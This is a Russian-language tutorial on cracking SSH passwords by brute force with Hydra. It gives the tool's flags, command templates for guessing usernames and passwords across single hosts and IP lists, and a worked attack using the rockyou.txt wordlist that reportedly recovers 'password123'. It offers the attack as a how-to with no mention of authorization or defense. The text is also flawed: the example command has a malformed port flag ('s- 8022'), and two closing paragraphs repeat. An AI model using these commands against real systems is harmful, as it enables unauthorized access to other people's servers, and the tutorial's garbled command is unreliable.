Как взломать пароль SSH с помощью Hydra

Hydra — это мощный инструмент для взлома паролей методом брутфорс. Сегодня покажу, как с помощью Hydra взломать пароль SSH.

Как взломать пароль SSH с помощью Hydra

Hydra — это распараллеленый брутфорс паролей различных сервисов (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.). С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

В основе программы лежит модульная структура. С помощью Гидры можно подобрать пароль к более чем 30 протоколам, включая telnet, ftp, http, https, smb, несколькими СУБД, и т.д. И да, Hydra брутит SSH. В целом Hydra отлично подойдет для взлома SSH.

В этом примере использовался дистрибутив Parros OS, вы можете использовать Гидра на любом другом Linux-дистрибутиве.

Установка Hydra на Linux

Hydra предустановлена в Kali Linux и Parrot OS. Для установки Hydra на другие дистрибутивы, используйте команду apt.

$ sudo apt install hydra

Запуск Hydra в Parrot OS

Для начала открываем справку:

$ hydra -h

Здесь можно видеть несколько примеров использования Hydra.

Примеры использования Hydra для взлома пароля SSH

В рамках этой статьи разберем пример взлома SSH. Для начала изучим аргументы:

-l — взлом пароля одного пользователя.

-L — взлом нескольких пользователей с помощью списка.

-p — взлом одного пароля.

-P — взлом паролей из списка.

-M — если много IP-адресов, используем этот аргумент для указания списка IP-адресов.

-v — для подробностей.

-V — отобразить журнал брута (логин+пароль).

-f — выйти, когда пароль найден.

-s — используется для указания порта, если служба не работает на порту по умолчанию.

Это только часть аргументов инструмента, полный список найдете в справке.

Брут пароля

Если неизвестен пароль:

$ hydra -l имя_пользователя -P словарь_паролей ssh

Брут имени пользователя

Если неизвестно имя пользователя:

$ hydra -L словарь_имен_пользователей -p пароль ssh

Брут имени пользователя и пароля

Если неизвестно имя пользователя и пароль:

$ hydra -L словарь_имен_пользователей -P словарь_паролей IP_адрес ssh

Количество одновременных попыток перебора

По умолчанию инструмент запускает 16 потоков, но можно изменить это значение с помощью аргумента -t:

$ hydra -l имя_пользователя -P словарь_для_брута IP_адрес -t количество_потоков ssh

Изменение порта

Иногда админы изменяют порт SSH со стандартного 22 на другой порт. Чтобы использовать другой порт, используем аргумент -s:

$ hydra -s номер_порта -l имя_пользователя -P словарь_для_брута ip-адрес ssh

Брутфорс списка IP-адресов

Можно также брутить несколько IP-адресов из списка -M:

$ hydra -l имя_пользователя -P словарь_для_брута -M список_ip_адресов ssh

Так будет выглядеть простая команда:

$ hydra -l имя_пользователя -P список_паролей IP ssh

Разберем команду. Сначала мы используем команду для запуска гидры, затем указываем имя пользователя -l или список пользователей -L, затем мы указываем пароль -p или список паролей -P.

Если SSH не работает на порту 22, тогда нужно указать порт с помощью аргумента -s. В конце указываем протокол SSH.

Взлом SSH с помощью Hydra

Рассмотрим реальный пример взлома SSH:

$ hydra -V -f -l u0_a150 -P /usr/share/wordlists/rockyou.txt 192.169.1.7 s- 8022 ssh

Я использую -V для просмотра журнала, -f выхода и -s для указания порта. Также использую популярный список паролей rockyou.txt.

Запускаем атаку и ждем. Если пароль присутствует в словаре для брута паролей, он будет взломан.

Как видим на скрине пароль SSH взломан. В моем случае это было легкий пароль password123.

Запускаем атаку и ждем. Если пароль присутствует в словаре для брута паролей, он будет взломан.

Как видим на скрине пароль SSH взломан. В моем случае это было легкий пароль password123.

На этом все. Теперь вы знаете, как взломать пароль SSH с помощью Hydra.